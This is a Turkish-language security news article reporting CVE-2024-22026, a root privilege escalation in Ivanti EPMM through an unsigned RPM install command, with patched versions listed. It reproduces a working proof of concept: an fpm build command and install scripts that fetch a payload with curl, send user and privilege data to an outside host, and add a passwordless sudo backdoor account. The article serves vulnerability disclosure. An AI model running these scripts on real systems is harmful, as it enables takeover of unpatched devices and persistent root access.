Ivanti EPMM MobileIron Core için PoC Exploit Yayınlandı

   Mayıs 16, 2024  Posted in CyberSecurityNews


Ivanti EPMM MobileIron Core için PoC Exploit Yayınlandı

Eski adı MobileIron Core olan Ivanti Endpoint Manager Mobile’da (EPMM) yeni açıklanan CVE-2024-22026 güvenlik açığı bulundu.

Bu güvenlik açığı, yerel bir saldırganın etkilenen sistemlere kök erişimi sağlamasına olanak tanır.

Bu güvenlik açığının ciddiyeti şu anda belirlenmemiştir.

CVE-2024-22026: Yerel Ayrıcalık Arttırılması Güvenlik Açığı

CVE-2024-22026’nın saldırı vektörü yereldir, yani Github’un raporlarına göre saldırganın güvenlik açığından yararlanabilmesi için sisteme yerel erişime sahip olması gerekir.

Saldırgan bir kez istismar edildiğinde, sistem üzerinde tam kontrol sağlayan ve potansiyel olarak önemli güvenlik ihlallerine yol açabilecek kök erişimi elde edebilir.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Keşif

Cihaz, RPM paketlerini almak ve yüklemek için düşük ayrıcalıklı bir kullanıcı olarak aşağıdaki komutu kullanır:

install rpm url

Bu komut, aşağıdakilerin gerçekleşmesini sağlayan ve root olarak çalışan bir CLI sarmalayıcısıdır:

/bin/rpm -Uvh *.rpm

RPM komutunun kendisi imzaları kontrol etmediği veya URL’leri engellemediği için herhangi bir RPM paketini çalıştırmak mümkündür. Bir saldırgan sahte bir RPM paketi oluşturup bunu cihaza göndererek cihazı savunmasız hale getirebilir.

Sömürü PoCKötü Amaçlı RPM Oluşturma

Kötü amaçlı bir RPM paketi oluşturmak için aşağıdaki komut kullanılır:

fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

Komut Dosyasını Önyükleme (preinstall.sh)

#!/bin/sh

curl -O http:///poc

exit 0

Postinstall Script (postinstall.sh)

#!/bin/sh

set -e  # Enable strict error checking

# Report back current user and privilege level

CURRENT_USER=$(whoami | base64)

PRIV_LEVEL=$(id -u | base64)

curl http:///poc?user=$CURRENT_USER

curl http:///poc?priv=$PRIV_LEVEL

# Create a new root user

if ! useradd -s /bin/sh -m exploit-poc; then

  echo "Failed to add user 'exploit-poc'" >&2

  exit 1

fi

echo "exploit-poc:" | chpasswd

 # Grant root privileges

if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then

  echo "Failed to modify sudoers file" >&2

  exit 1

fi

exit 0

RPM’yi Getirmek için CLI Komutunu Çalıştırma: Saldırgan, bu kusurdan yararlanmak amacıyla kötü amaçlı RPM’yi almak ve yüklemek için CLI’de aşağıdaki kodu kullanır:

install rpm url http:///ivanti-privesc-13.37-1.i386.rpm

Ivanti, bu güvenlik açığını gidermek için 12.1.0.0, 12.0.0.0 ve 11.12.0.1 sürümlerinde yamalar yayınladı.

CVE-2024-22026 ile ilişkili riski azaltmak için kullanıcıların bu sürümleri güncellemeleri önemle tavsiye edilir.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free



Source link